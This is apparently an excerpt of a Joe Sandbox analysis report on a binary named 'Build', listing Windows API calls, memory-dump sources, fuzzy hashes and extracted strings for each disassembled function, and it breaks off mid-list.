                                                                                                                                                                                • Instruction Fuzzy Hash: 20D180B1900249ABDB25DF64CC81BEEB7E9FF04700F00459AFA59E7241DB74AB44DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualQuery.KERNEL32(80000000,00B60AC5,0000001C,00B60CBA,00000000,?,?,?,?,?,?,?,00B60AC5,00000004,00BA5D24,00B60D4A), ref: 00B60B91
                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B60AC5,00000004,00BA5D24,00B60D4A), ref: 00B60BAC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                • String ID: D
                                                                                                                                                                                • API String ID: 401686933-2746444292
                                                                                                                                                                                • Opcode ID: c9a56f0e23cd560d24c9a7a5e0d06ed6c77c6262fdaa49609d968327b6bd55b0
                                                                                                                                                                                • Instruction ID: bcb7fbae1a0c7338646ca476f62785c27eabf4ac045c94599aa43e6afba7079a
                                                                                                                                                                                • Opcode Fuzzy Hash: c9a56f0e23cd560d24c9a7a5e0d06ed6c77c6262fdaa49609d968327b6bd55b0
                                                                                                                                                                                • Instruction Fuzzy Hash: BE01F7326101096BCB14EF2ADC05FDE7BE9EFC4328F0CC124AD59E7244DA38E805CA80
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5D0E1
                                                                                                                                                                                • GetNumberFormatW.KERNEL32(00000400,00000000,?,00B8272C,?,?), ref: 00B5D12A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2169056816-0
                                                                                                                                                                                • Opcode ID: c18a48048eabb96659b82272e0d74546e31ba1d9e54d3088bab0c7b2a6550d33
                                                                                                                                                                                • Instruction ID: 4615e957687a9f1cde149d9bcd92702f33c2635ffd8873bfa65dfffd35d8d9b2
                                                                                                                                                                                • Opcode Fuzzy Hash: c18a48048eabb96659b82272e0d74546e31ba1d9e54d3088bab0c7b2a6550d33
                                                                                                                                                                                • Instruction Fuzzy Hash: 08118E39210308AFD711DF65DC45BAB73F8EF08710F50446AF905E71A1EA709E44CB54
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00B4D0A7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                                                • Opcode ID: bcc4474bcf2e4c944e65b30e31477101b95d227a3138a853d52251af28da82a1
                                                                                                                                                                                • Instruction ID: bdb7c40ab28a98164cd331612fb2e1db1d1eb12274566168894102ddeb733205
                                                                                                                                                                                • Opcode Fuzzy Hash: bcc4474bcf2e4c944e65b30e31477101b95d227a3138a853d52251af28da82a1
                                                                                                                                                                                • Instruction Fuzzy Hash: D60146B4A00608CFDB28CF28EC91A9977F1FB58304F204259E91A973A1DF30AA49DB40
                                                                                                                                                                                APIs
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B50284
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                  • Part of subcall function 00B53F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00B4F801,00000000,00000000,?,00B85070,?,00B4F801,?,?,00000050,?), ref: 00B53F64
                                                                                                                                                                                • _strlen.LIBCMT ref: 00B502A5
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00B82274,?), ref: 00B502FE
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00B50334
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00B50340
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B503EB
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00B5041B
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00B5044A
                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00B50452
                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00B5045D
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5048D
                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00B504FF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                                • String ID: $%s:$CAPTION$d
                                                                                                                                                                                • API String ID: 2407758923-2512411981
                                                                                                                                                                                • Opcode ID: 99f1a59a0794581db23eae442ffe22af3df1984ddb3a0b0df5f5cc69b2bd284d
                                                                                                                                                                                • Instruction ID: ffb4f1d2d12291da0d13d43e0c5c762b54ec3d8d9977a96c439825cc26e76983
                                                                                                                                                                                • Opcode Fuzzy Hash: 99f1a59a0794581db23eae442ffe22af3df1984ddb3a0b0df5f5cc69b2bd284d
                                                                                                                                                                                • Instruction Fuzzy Hash: 50817B72608301AFD714EF68CD89B6FBBE9EB89705F00095DF985A3250DB34E909CB52
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00B6F1B6
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6ED6E
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6ED80
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6ED92
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDA4
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDB6
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDC8
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDDA
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDEC
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDFE
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE10
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE22
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE34
                                                                                                                                                                                  • Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE46
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F1AB
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F1CD
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F1E2
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F1ED
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F20F
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F222
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F230
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F23B
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F273
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F27A
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F297
                                                                                                                                                                                • _free.LIBCMT ref: 00B6F2AF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                • Opcode ID: a2dc53c68563d4c09cdfa222812bbdb2a4eb8ffeac0dfb263c39b874f139954c
                                                                                                                                                                                • Instruction ID: f500f5c9b468b9a503dce3c26b754103497cf15d7399bfb8f6a38675ed997966
                                                                                                                                                                                • Opcode Fuzzy Hash: a2dc53c68563d4c09cdfa222812bbdb2a4eb8ffeac0dfb263c39b874f139954c
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D311832600606DFEB61AAA9E845BA673FAFF01350F2444A9F45AD6151DF79ED80CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00B5FA20
                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000800), ref: 00B5FA4C
                                                                                                                                                                                  • Part of subcall function 00B54168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B4E084,00000000,.exe,?,?,00000800,?,?,?,00B5AD5D), ref: 00B5417E
                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B5FA68
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B5FA7F
                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B5FA93
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B5FABC
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00B5FAC3
                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00B5FACC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                • String ID: STATIC
                                                                                                                                                                                • API String ID: 3820355801-1882779555
                                                                                                                                                                                • Opcode ID: 9397b134b393ecddf01e5a634121b8f9cae7928e753ff364cfd39df736f94edf
                                                                                                                                                                                • Instruction ID: 5ced3ba7b25cb0d16b21d58c8a37662f3e0ff80b06a917501bebdffabea470f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 9397b134b393ecddf01e5a634121b8f9cae7928e753ff364cfd39df736f94edf
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D2136325887117FE220AB749C4BFAFB6EDEB49702F0004A5FE45A6091DF748C0986A2
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B8C5
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B8D1
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B8DC
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B8E7
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B8F2
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B8FD
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B908
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B913
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B91E
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B92C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 14ca3117b02d29309c668ac87499fa7d2a8fcb82250148d134f2156bd898d40c
                                                                                                                                                                                • Instruction ID: 642dd2ec26ec9bff1c1d67737f49fbe77e4bbff448c0a99c17cb1fc5c3eb2c05
                                                                                                                                                                                • Opcode Fuzzy Hash: 14ca3117b02d29309c668ac87499fa7d2a8fcb82250148d134f2156bd898d40c
                                                                                                                                                                                • Instruction Fuzzy Hash: CE11A77A110148AFCB01EF99C992CD93BBAEF04350B0180A5FA098B122DB75EE91DB80
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                • API String ID: 322700389-393685449
                                                                                                                                                                                • Opcode ID: 9ea9d88c51b92918634cab8101732e171fdf5a57099a5e0dc3c2eed75b208e18
                                                                                                                                                                                • Instruction ID: bb422b159268dad1159030066d739160fe19e8df4fbfe5d0c9bd8aa9e0213c01
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea9d88c51b92918634cab8101732e171fdf5a57099a5e0dc3c2eed75b208e18
                                                                                                                                                                                • Instruction Fuzzy Hash: DAB11571800A19EFCF25DFA4C881AAEB7F5FF14310F144599E8166B212D739DE61CBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5B656
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5B6F6
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00B5B705
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B5B726
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                                                                                                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                • API String ID: 1116704506-4209811716
                                                                                                                                                                                • Opcode ID: ec3239aa3dadff9a45f629f478e5c3761549d883663b6c158a9909bcfee2c338
                                                                                                                                                                                • Instruction ID: 38002ea03fa5a81a28316da4693272598f969d607764a8eb72c090f06aa480b5
                                                                                                                                                                                • Opcode Fuzzy Hash: ec3239aa3dadff9a45f629f478e5c3761549d883663b6c158a9909bcfee2c338
                                                                                                                                                                                • Instruction Fuzzy Hash: B131F3322083017AE725AB31DC46F6FB7DCDF95321F1401DAF905A61D2FFA8994983A6
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
                                                                                                                                                                                  • Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00B5D910
                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000001,0003046F), ref: 00B5D937
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B5D950
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00B5D961
                                                                                                                                                                                • GetDlgItem.USER32(?,00000065), ref: 00B5D96A
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B5D97E
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B5D994
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                                • String ID: LICENSEDLG
                                                                                                                                                                                • API String ID: 3214253823-2177901306
                                                                                                                                                                                • Opcode ID: 1978b8e408092eb43f0b6bcbddee4bc25b245bdde5bc3bd089958639b565a92d
                                                                                                                                                                                • Instruction ID: 519bc3e2df052a71d5ee4167e9e77d5f4dc4be13be48c5ec4967d84f4e49cb8f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1978b8e408092eb43f0b6bcbddee4bc25b245bdde5bc3bd089958639b565a92d
                                                                                                                                                                                • Instruction Fuzzy Hash: F221D3322882047BE7215F65EC4AF3B7BECEB47B96F004599FA00A31A0DF6299059731
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4BFA3
                                                                                                                                                                                  • Part of subcall function 00B534D7: GetSystemTime.KERNEL32(?,00000000), ref: 00B534EF
                                                                                                                                                                                  • Part of subcall function 00B534D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B534FD
                                                                                                                                                                                  • Part of subcall function 00B53480: __aulldiv.LIBCMT ref: 00B53489
                                                                                                                                                                                • __aulldiv.LIBCMT ref: 00B4BFCF
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 00B4BFD6
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B4C001
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4C00B
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B4C061
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4C06B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
